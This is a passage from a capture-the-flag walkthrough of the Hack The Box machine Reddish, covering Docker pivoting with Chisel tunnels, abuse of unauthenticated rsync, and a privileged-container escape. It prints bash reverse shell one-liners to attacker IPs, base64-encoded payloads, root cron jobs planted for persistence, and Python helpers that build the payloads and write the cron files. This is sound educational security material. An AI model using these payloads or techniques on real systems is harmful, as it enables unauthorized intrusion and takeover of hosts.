root@nodered:/tmp# ./chisel client 10.10.14.19:8000 1337:127.0.0.1:1337 &

[/panel]



Now I can grab the user hash.

But this is just a user flag, and I am still inside the docker. What’s next?



Docker. Container III: backup

The structure of the backup script raises a logical question: what is the authentication procedure on the backup server? And the answer is: there is no authentication! Anyone who manages to reach www over the network can access the file system of the backup container.

Based on the ip addr output for www, this container has access to the 172.20.0.0/16 subnetwork; however, the address of the backup server still remains unknown. By analogy with other network nodes, I can assume that its IP address is 172.20.0.2.

I have to verify this assumption. No information on the backup server can be found in the /etc/hosts file; however, I can find out its address in a different way: by sending an ICMP request from www to backup.

[panel template=term]

www-data@www:/$ ping -c1 backup

ping: icmp open socket: Operation not permitted

[/panel]

This must be done from a privileged shell because www-data does not have enough rights to open the required raw socket.

[panel template=term]

root@www:~# ping -c1 backup

PING backup (172.20.0.2) 56(84) bytes of data.

64 bytes from reddish_composition_backup_1.reddish_composition_internal-network-2 (172.20.0.2): icmp_seq=1 ttl=64 time=0.051 ms

--- backup ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.051/0.051/0.051/0.000 ms

[/panel]

Success! Now I know that the address of backup is 172.20.0.2. Time to update the network map.

As said above, I have access to www, and rsync on backup (port 873) does not require authentication; ergo, I have read/write access to the backup file system.

For instance, I can view the root folder of backup.

[panel template=term]

www-data@www:/tmp$ rsync rsync://backup:873/src/

...

[/panel]



Or read the shadow file.

[panel template=term]

www-data@www:/tmp$ rsync -a rsync://backup:873/src/etc/shadow .

www-data@www:/tmp$ cat shadow

...

[/panel]



Or write any file into any directory on backup.

[panel template=term]

www-data@www:/tmp$ echo 'HELLO THERE' > .test

www-data@www:/tmp$ rsync -a .test rsync://backup:873/src/etc/

-rw-r--r-- 12 2020/02/02 16:25:49 .test

[/panel]

Time to get a shell: I am going to create a malicious cron job that launches a reverse shell, write it into /etc/cron.d/ on the backup server, and catch the callback on Kali. But I face yet another connectivity problem: backup can communicate only with www, and www only with nodered. So, I have no choice but to build a tunneling chain: from backup to www, from www to nodered, and from nodered to Kali.

Getting a root shell

In strict adherence to the divide-and-conquer principle, I decompose a complex task into two simple subtasks and then merge the results.

- Forwarding local port 1111 from the nodered container to port 8000 on Kali, where a Chisel server is running. This enables me to address 172.19.0.4:1111 as if it were the Chisel server on Kali.

[panel template=term]

root@nodered:/tmp# ./chisel client 10.10.14.19:8000 1111:127.0.0.1:8000 &

[/panel]

- Setting up the forwarding from www to Kali: I connect to 172.19.0.4:1111 (as if I could connect to Kali directly) and forward local port 2222 to port 3333 on Kali.

[panel template=term]

www-data@www:/tmp$ ./chisel client 172.19.0.4:1111 2222:127.0.0.1:3333 &

[/panel]

Now everything that comes to port 2222 on www will be forwarded through a chain of tunnels to port 3333 on the attacker’s machine.
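Conceptually, each hop in this chain does what a plain TCP relay does: accept a connection on one port and pipe its bytes to another address, in both directions. Chisel itself does more (it carries the traffic over HTTP, secured with SSH, and multiplexes many forwards over one connection), so the following is only a minimal Python sketch of the relay idea. start_forwarder and its helpers are hypothetical names, not part of Chisel.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass  # one side reset the connection; just stop relaying
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF to the other side
        except OSError:
            pass


def _relay(client: socket.socket, target: tuple) -> None:
    """Connect to the target and shuttle bytes both ways until both sides are done."""
    with client, socket.create_connection(target) as upstream:
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()
        _pump(client, upstream)
        back.join()


def start_forwarder(listen_port: int, target_host: str, target_port: int,
                    bind_host: str = "127.0.0.1") -> socket.socket:
    """Forward every connection to bind_host:listen_port on to target_host:target_port.

    Runs in background daemon threads; returns the listening socket so the caller
    can read the chosen port (pass 0 for any free port) or close it to stop.
    """
    server = socket.create_server((bind_host, listen_port))

    def serve() -> None:
        while True:
            try:
                client, _ = server.accept()
            except OSError:  # the listening socket was closed
                return
            threading.Thread(target=_relay, args=(client, (target_host, target_port)),
                             daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return server
```

On a host that could reach Kali directly, start_forwarder(2222, "10.10.14.19", 3333, bind_host="0.0.0.0") would mimic a single hop; www cannot reach Kali, which is exactly why the chain has to pass through nodered.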

Network map. Part 7: Tunneling chain www <=> nodered <=> Kali

[panel]

Note

For practical purposes (e.g. to deliver the chisel executable to the www container), I had to open a great many auxiliary tunnels. For clarity, I do not describe them in this walkthrough, and they aren't shown on the network map.

[/panel]



Finally, all I have to do is create a reverse shell script and a cron job, upload them to backup, wait for cron to run, and catch the shell on Kali.

Creating a shell.

[panel template=term]

root@www:/tmp# echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMC4zLzIyMjIgMD4mMScK | base64 -d > shell.sh

root@www:/tmp# cat shell.sh

bash -c 'bash -i >& /dev/tcp/172.20.0.3/2222 0>&1'

[/panel]
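The payload is passed around base64-encoded so that its quotes, `>` and `&` survive being typed through nested shells intact; `base64 -d` restores it byte for byte, including the trailing newline. A small Python sketch of the round trip (the helper names are hypothetical) that reproduces the exact blobs used in this walkthrough:

```python
import base64


def reverse_shell_line(host: str, port: int) -> str:
    """The bash one-liner used in this walkthrough, with its trailing newline."""
    return f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1'\n"


def encode_payload(host: str, port: int) -> str:
    """Base64-encode the one-liner so it can be pasted without quoting trouble."""
    return base64.b64encode(reverse_shell_line(host, port).encode()).decode()


def decode_payload(blob: str) -> str:
    """Equivalent of `echo <blob> | base64 -d`."""
    return base64.b64decode(blob).decode()
```

encode_payload("172.20.0.3", 2222) yields the blob echoed on www above, and encode_payload("10.10.14.19", 9999) the one used later on backup.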

Creating a cron job that runs every minute.

[panel template=term]

root@www:/tmp# echo '* * * * * root bash /tmp/shell.sh' > shell

[/panel]
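Unlike a personal crontab, an /etc/cron.d entry carries a sixth field naming the user to run as (root here). If the container uses Debian's cron, which is an assumption, the file name also matters: only names made of letters, digits, underscores and hyphens are read, so shell works while something like shell.sh would be silently ignored. A minimal sketch of both rules; the helper names are hypothetical.

```python
import re

# Assumption: Debian's cron, which only reads /etc/cron.d files named with
# letters, digits, underscores and hyphens (the run-parts naming convention).
_CRON_D_NAME = re.compile(r"[A-Za-z0-9_-]+")


def cron_d_entry(command: str, user: str = "root", schedule: str = "* * * * *") -> str:
    """Build one /etc/cron.d line: five time fields, the user to run as, the command.

    The entry ends with a newline, as cron expects each line to.
    """
    fields = schedule.split()
    if len(fields) != 5:
        raise ValueError(f"expected 5 schedule fields, got {len(fields)}")
    return " ".join(fields + [user, command]) + "\n"


def is_valid_cron_d_name(name: str) -> bool:
    """Check a file name against the run-parts naming convention."""
    return _CRON_D_NAME.fullmatch(name) is not None
```

cron_d_entry("bash /tmp/shell.sh") produces the same line that the echo command above writes into the file named shell.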

Uploading both files to backup using rsync.

[panel template=term]

root@www:/tmp# rsync -a shell.sh rsync://backup:873/src/tmp/

root@www:/tmp# rsync -a shell rsync://backup:873/src/etc/cron.d/

[/panel]

A moment later, I receive a connection on port 3333 on the Kali machine.

Seizing control over the Reddish host



After examining the file system of backup, I see the following picture:

All drives of the host OS can be accessed from the /dev directory. This means that the backup container was deployed on Reddish with the --privileged flag, which grants the container virtually all the powers of the host.

[panel template=www]

Hacking Docker the Easy way – an interesting presentation about the audit of docker containers.

[/panel]
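The /dev listing is one hint of a privileged container; another is the capability set of its processes. A container started with --privileged keeps CAP_SYS_ADMIN (capability number 21), which mount needs, whereas Docker's default capability set drops it. A minimal sketch that reads the CapEff bitmask from /proc/self/status; the helper names are hypothetical, and the check is a heuristic rather than proof.

```python
CAP_NET_RAW = 13    # needed for raw sockets, e.g. the ones ping opens
CAP_SYS_ADMIN = 21  # needed for mount(2), among many other things


def effective_caps(status_text: str) -> int:
    """Extract the CapEff bitmask from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_cap(mask: int, cap: int) -> bool:
    """Return True if capability number `cap` is set in `mask`."""
    return bool((mask >> cap) & 1)


def looks_privileged(status_text: str) -> bool:
    """Heuristic: a default Docker container lacks CAP_SYS_ADMIN, a --privileged one keeps it."""
    return has_cap(effective_caps(status_text), CAP_SYS_ADMIN)


# Usage inside a container (as root):
#     with open("/proc/self/status") as f:
#         print(looks_privileged(f.read()))
```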



If I mount /dev/sda1, for instance, I can explore the Reddish file system.
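To choose which device to mount, the kernel's own list of block devices in /proc/partitions is enough (ls /dev works too). A small parser sketch with a hypothetical name; the test uses made-up sizes, not the real Reddish disk. Once a partition is chosen, something like mkdir /tmp/sda1 && mount /dev/sda1 /tmp/sda1 gives the mount point that appears in the prompts of this section.

```python
def list_partitions(proc_partitions: str) -> list:
    """Parse /proc/partitions into (device name, size in 1 KiB blocks) pairs."""
    devices = []
    for line in proc_partitions.splitlines():
        fields = line.split()
        # Skip the header ("major minor #blocks name") and the blank line after it.
        if len(fields) != 4 or not fields[0].isdigit():
            continue
        devices.append((fields[3], int(fields[2])))
    return devices


# Usage inside the container:
#     with open("/proc/partitions") as f:
#         print(list_partitions(f.read()))
```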

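I can get a shell by creating a cron job and dropping it into etc/cron.d/ on the mounted partition (here mounted at /tmp/sda1), as I did to get inside the backup container. Note that the cron job refers to /tmp/shell.sh: that path is resolved by the host's cron, so from inside the container the script has to be written to /tmp/sda1/tmp/shell.sh.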

[panel template=term]

root@backup:/tmp/sda1/etc/cron.d# echo 'YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOS85OTk5IDA+JjEnCg==' | base64 -d > /tmp/sda1/tmp/shell.sh

root@backup:/tmp/sda1/etc/cron.d# cat ../../tmp/shell.sh

bash -c 'bash -i >& /dev/tcp/10.10.14.19/9999 0>&1'

root@backup:/tmp/sda1/etc/cron.d# echo '* * * * * root bash /tmp/shell.sh' > shell

[/panel]
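The one thing that is easy to get wrong here is the path translation: files are written under the mount point, but the cron entry must name the path as the host sees it, because the host's cron daemon runs it. A minimal Python sketch of the same two writes; plant_cron_job is a hypothetical helper, and the test uses a temporary directory instead of a real mounted disk.

```python
from pathlib import Path


def plant_cron_job(host_root: str, payload: str, job_name: str = "shell",
                   script_path: str = "/tmp/shell.sh") -> Path:
    """Write a payload script and a cron.d entry into a host file system mounted at host_root.

    script_path is the path as the *host* sees it; it is placed under host_root
    on disk but written verbatim into the cron entry.
    """
    root = Path(host_root)
    script = root / script_path.lstrip("/")  # e.g. /tmp/sda1/tmp/shell.sh
    script.parent.mkdir(parents=True, exist_ok=True)
    script.write_text(payload)

    cron_file = root / "etc" / "cron.d" / job_name  # e.g. /tmp/sda1/etc/cron.d/shell
    cron_file.parent.mkdir(parents=True, exist_ok=True)
    cron_file.write_text(f"* * * * * root bash {script_path}\n")
    return cron_file
```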

Now the callback from the reverse shell will come in a ‘normal way’: through the real 10.10.0.0/16 network (i.e. not through the thickets of virtual docker interfaces) to port 9999 on my Kali VM.



The ip addr command shows numerous docker networks.

I grab the root flag – and the task is completed!

[panel template=term]

root@backup:/tmp/sda1# cat root/root.txt


50d0db64????????????????????????

[/panel]

[panel template=www]

PayloadsAllTheThings / Network Pivoting Techniques – a good traffic routing cheatsheet including a list of useful utilities

[/panel]

Epilogue

Docker config

Now that I have full access to the system, I can, out of curiosity, open the docker config /opt/reddish_composition/docker-compose.yml.

I see there the following:

- list of ports accessible ‘from the outside’ (line 7);

- internal network shared by the www and redis containers (line 10);

- configurations of all containers (nodered, www, redis, and backup); and

- --privileged flag set on the backup container (line 38).

So, I can update the network map one last time based on this config.
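Reading such a config can be partly automated. The sketch below takes an already-parsed docker-compose.yml (for example from PyYAML's yaml.safe_load, a third-party dependency) and lists, per service, the published ports, the attached networks, and whether privileged: true is set. audit_compose is a hypothetical name, and the test uses a made-up config, not the actual Reddish file.

```python
def audit_compose(config: dict) -> dict:
    """Summarise a parsed docker-compose config: published ports, networks, privileged flag."""
    report = {}
    for name, service in config.get("services", {}).items():
        notes = [f"publishes {port}" for port in service.get("ports", [])]
        networks = service.get("networks", [])  # may be a list or a mapping
        if networks:
            notes.append("networks: " + ", ".join(sorted(networks)))
        if service.get("privileged"):
            notes.append("PRIVILEGED")
        report[name] = notes
    return report


# Usage (requires PyYAML):
#     import yaml
#     with open("/opt/reddish_composition/docker-compose.yml") as f:
#         for service, notes in audit_compose(yaml.safe_load(f)).items():
#             print(service, notes)
```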

Chisel SOCKS

In fact, Reddish could have been hacked in a much simpler way, because Chisel supports SOCKS proxying. There was no need to manually create a separate tunnel for each forwarded port (although doing so was useful for educational purposes, to get a general understanding of how everything works). Still, proxies make a pentester's life much easier.

The only difficulty is that Chisel can run a SOCKS server only in server mode. In other words, I would have had to drop Chisel on an interim host (e.g. nodered), launch it in server mode, and connect to that server from Kali. But this was impossible! As you remember, the only way to interact with the internal docker container network was to forward a reverse connection from it to my PC.

But this problem can be circumvented by launching ‘Chisel over Chisel’. In this setup, the first Chisel acts as an ordinary server that gives me a reverse connection to nodered, while the second Chisel acts as a SOCKS proxy server. Here is how it works.

[panel template=term]

root@kali:~/chisel# ./chisel server -v -reverse -p 8000

[/panel]

As usual, I start by launching a server on my Kali VM that accepts reverse connections.

[panel template=term]

root@nodered:/tmp# ./chisel client 10.10.14.19:8000 R:127.0.0.1:8001:127.0.0.1:31337 &

[/panel]

Then I set up a reverse port forward between nodered (port 31337) and Kali (port 8001): everything that arrives at localhost:8001 on Kali is forwarded to localhost:31337 on nodered.
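Chisel's remote strings are compact, and it is easy to mix up which side opens the listening port. Going by my reading of the chisel README, a remote has the form [R:]local-host:local-port:remote-host:remote-port: without the prefix, the client listens and the server dials the target; the R: prefix swaps those roles; local-host defaults to 0.0.0.0, and a socks remote listens on 1080 unless a port is given. A hypothetical parser covering only the forms used in this article makes the roles explicit:

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Remote:
    reverse: bool               # "R:" prefix: the server listens, the client dials the target
    local_host: str             # interface the listening side binds to
    local_port: int             # port the listening side opens
    remote_host: str            # host the other side connects to, or "socks"
    remote_port: Optional[int]  # None for a SOCKS remote


def parse_remote(spec: str) -> Remote:
    """Parse "[R:][local-host:]local-port:remote-host:remote-port" or "[R:][[host:]port:]socks".

    Defaults follow my reading of the chisel README; other forms are rejected.
    """
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks":
        if len(parts) > 3:
            raise ValueError(f"unsupported remote: {spec!r}")
        local_port = int(parts[-2]) if len(parts) >= 2 else 1080
        local_host = parts[-3] if len(parts) == 3 else "0.0.0.0"
        return Remote(reverse, local_host, local_port, "socks", None)
    if len(parts) == 3:
        parts.insert(0, "0.0.0.0")  # local-host omitted: listen on all interfaces
    if len(parts) != 4:
        raise ValueError(f"unsupported remote: {spec!r}")
    local_host, local_port, remote_host, remote_port = parts
    return Remote(reverse, local_host, int(local_port), remote_host, int(remote_port))
```

For R:127.0.0.1:8001:127.0.0.1:31337 it reports reverse=True: the server on Kali binds 127.0.0.1:8001, and the client on nodered dials 127.0.0.1:31337, which is the behaviour described above.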

[panel template=term]

root@nodered:/tmp# ./chisel server -v -p 31337 --socks5

[/panel]

Next, I launch Chisel in the SOCKS server mode on nodered to listen on port 31337.

[panel template=term]

root@kali:~/chisel# ./chisel client 127.0.0.1:8001 1080:socks

[/panel]

And finally, I launch an additional Chisel client on Kali (with socks as the remote-host argument) that connects to local port 8001. Here the magic begins: this client opens a SOCKS listener on local port 1080, and traffic sent to it travels via port 8001 through the reverse tunnel (serviced by the first Chisel server on port 8000) to the 127.0.0.1 interface of the nodered container, i.e. to port 31337, where the SOCKS-enabled Chisel server is already running. To send a tool through this chain, proxychains only needs a socks5 127.0.0.1 1080 entry in its configuration.

[panel template=term]

root@kali:~# proxychains4 nmap -n -Pn -sT -sV -sC 172.19.0.3 -p6379

...

PORT STATE SERVICE VERSION

6379/tcp open redis Redis key-value store 4.0.9

...

[/panel]

From this point forward, I can reach any host on any port (provided that nodered can reach it), while the SOCKS proxy takes care of the routing.
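For every connection, a SOCKS client such as proxychains runs a short handshake with the proxy on 127.0.0.1:1080 before any application data flows. The sketch below follows the SOCKS5 layout from RFC 1928 (greeting offering "no authentication", then a CONNECT request with an IPv4 address and a big-endian port); the function names are hypothetical, and proxychains' own implementation may differ in details.

```python
import ipaddress
import socket
import struct


def socks5_greeting() -> bytes:
    """Client greeting: version 5, one method offered, method 0x00 (no authentication)."""
    return b"\x05\x01\x00"


def socks5_connect_request(dst_ip: str, dst_port: int) -> bytes:
    """CONNECT request for an IPv4 destination: VER CMD RSV ATYP DST.ADDR DST.PORT."""
    return (b"\x05\x01\x00\x01"
            + ipaddress.IPv4Address(dst_ip).packed
            + struct.pack("!H", dst_port))


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or fail if the proxy hangs up."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks5_open(proxy: tuple, dst_ip: str, dst_port: int) -> socket.socket:
    """Return a socket tunnelled to dst_ip:dst_port through a SOCKS5 proxy."""
    sock = socket.create_connection(proxy)
    try:
        sock.sendall(socks5_greeting())
        if _recv_exact(sock, 2) != b"\x05\x00":
            raise ConnectionError("proxy did not accept the no-auth method")
        sock.sendall(socks5_connect_request(dst_ip, dst_port))
        _ver, rep, _rsv, atyp = _recv_exact(sock, 4)
        if rep != 0:
            raise ConnectionError(f"SOCKS5 CONNECT failed with reply code {rep}")
        # Skip BND.ADDR and BND.PORT; their length depends on the address type.
        if atyp == 1:
            _recv_exact(sock, 4 + 2)
        elif atyp == 4:
            _recv_exact(sock, 16 + 2)
        elif atyp == 3:
            _recv_exact(sock, _recv_exact(sock, 1)[0] + 2)
        else:
            raise ConnectionError(f"unknown address type {atyp}")
        return sock
    except Exception:
        sock.close()
        raise
```

With the tunnel chain up, socks5_open(("127.0.0.1", 1080), "172.19.0.3", 6379) would be expected to hand back a socket connected to Redis, much like the proxychains nmap run above.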